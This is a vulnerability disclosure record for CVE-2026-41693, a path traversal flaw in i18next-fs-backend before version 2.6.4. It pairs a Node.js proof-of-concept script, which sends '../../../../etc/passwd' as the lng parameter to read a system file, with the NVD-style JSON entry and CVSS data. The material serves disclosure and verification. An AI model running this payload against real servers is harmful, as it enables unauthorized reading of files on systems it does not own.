CVE-2026-41693

// PoC: Path Traversal in i18next-fs-backend < 2.6.4 // This PoC demonstrates reading /etc/passwd by manipulating the 'lng' parameter. const http = require('http'); const targetHost = 'localhost'; const targetPort = 3000; const path = '/translations'; // Endpoint using i18next-fs-backend // Malicious payload to traverse directories const maliciousLng = '../../../../etc/passwd'; const options = { hostname: targetHost, port: targetPort, path: `${path}?lng=${maliciousLng}`, method: 'GET' }; const req = http.request(options, (res) => { console.log(`Status: ${res.statusCode}`); console.log(`Headers: ${JSON.stringify(res.headers)}`); res.setEncoding('utf8'); res.on('data', (chunk) => { console.log(`Body: ${chunk}`); // Check if the response contains content from /etc/passwd if (chunk.includes('root:') || chunk.includes('nobody:')) { console.log('[+] Vulnerability confirmed: Successfully read file outside intended directory.'); } }); }); req.on('error', (e) => { console.error(`Request error: ${e.message}`); }); req.end();

{"cve": {"id": "CVE-2026-41693", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:11.613", "lastModified": "2026-05-08T16:16:11.613", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "i18next-fs-backend is a backend layer for i18next using in Node.js and for Deno to load translations from the filesystem. Prior to version 2.6.4, i18next-fs-backend substitutes the lng and ns options directly into the configured loadPath / addPath templates and then read / write the resulting file from disk. The interpolation is unencoded and unvalidated, so a crafted lng or ns value — containing .., a path separator, a control character, a prototype key, or simply an unexpectedly long string — allows an attacker who can influence either value to read or overwrite files outside the intended locale directory. When lng / ns are derived from untrusted input (request-scoped i18next instances behind an HTTP layer such as i18next-http-middleware, or any framework that lets the end user pick the language via query string, cookie, or header), a single request such as ?lng=../../../../etc/passwd causes the backend to attempt to read that path. This issue has been patched in version 2.6.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj", "source": "[email protected]"}]}}